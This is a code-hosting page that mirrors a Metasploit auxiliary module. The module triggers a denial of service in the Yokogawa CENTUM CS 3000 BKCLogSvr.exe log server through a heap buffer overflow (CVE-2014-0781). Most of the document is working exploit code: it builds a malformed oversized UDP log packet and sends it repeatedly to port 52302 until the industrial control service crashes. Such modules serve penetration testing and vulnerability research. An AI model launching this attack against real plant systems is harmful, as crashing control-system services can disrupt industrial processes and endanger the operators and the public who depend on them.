CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/scada/yokogawa_logsvr.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Udp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(update_info(info,

12
      'Name'           => 'Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer Overflow',

13
      'Description'    => %q{

14
        This module abuses a buffer overflow vulnerability to trigger a Denial of Service

15
        of the BKCLogSvr component in the Yokogaca CENTUM CS 3000 product. The vulnerability

16
        exists in the handling of malformed log packets, with an unexpected long level field.

17
        The root cause of the vulnerability is a combination of usage of uninitialized memory

18
        from the stack and a dangerous string copy. This module has been tested successfully

19
        on Yokogawa CENTUM CS 3000 R3.08.50.

20
      },

21
      'Author'         =>

22
        [

23
          'juan vazquez',

24
          'Redsadic <julian.vilas[at]gmail.com>'

25
        ],

26
      'References'     =>

27
        [

28
          [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],

29
          [ 'URL', 'https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities/' ],

30
          [ 'CVE', '2014-0781']

31
        ],

32
      'DisclosureDate' => '2014-03-10',

33
    ))

34


35
    register_options(

36
      [

37
        Opt::RPORT(52302),

38
        OptInt.new('RLIMIT', [true,  "Number of packets to send", 10])

39
      ])

40
  end

41


42
  def run

43
    if datastore['RLIMIT'] < 2

44
      print_error("Two consecutive packets are needed to trigger the DoS condition. Please increment RLIMIT.")

45
      return

46
    end

47


48
    # Crash due to read bad memory

49
    test = [1024].pack("V")             # packet length

50
    test << "AAAA"                      # Unknown

51
    test << "SOURCE\x00\x00"            # Source

52
    test << "\x00" * 8                  # Padding

53
    test << "B" * (1024 - test.length)  # Level & Message coalesced

54


55
    connect_udp

56


57
    # Sending two consecutives packages is enough to

58
    # trigger the overflow and cause the DoS. But if

59
    # legit packets are processed by the server, between

60
    # the two malformed packages, overflow won't happen.

61
    # Unfortunately because of the usage of UDP and the

62
    # absence of answer, there isn't a reliable way to

63
    # check if the DoS condition has been triggered.

64
    print_status("Sending #{datastore['RLIMIT']} packets...")

65
    (1..datastore['RLIMIT']).each do |i|

66
      vprint_status("Sending #{i}/#{datastore['RLIMIT']}...")

67
      udp_sock.put(test)

68
    end

69


70
    disconnect_udp

71
  end

72
end

73


74